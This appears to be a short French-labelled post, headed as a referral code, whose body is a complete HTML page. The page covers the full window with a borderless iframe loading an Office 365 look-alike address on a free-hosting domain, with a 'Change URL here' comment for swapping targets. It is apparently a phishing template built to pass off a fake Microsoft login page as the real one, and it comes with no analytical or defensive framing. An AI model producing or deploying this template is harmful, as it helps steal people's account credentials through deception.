Publié le 19-03-2025
Code de parrainage :
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Fullscreen External Page</title> <style> html, body { margin: 0; padding: 0; width: 100vw; height: 100vh; background-color: white; overflow: hidden; } #overlay { position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; background-color: white; z-index: 9999; } #content { width: 100%; height: 100%; border: none; } </style> </head> <body> <div id="overlay"> <iframe id="content" src="http://office365.fwh.is/office/index.html"></iframe> <!-- Change URL here --> </div> </body> </html>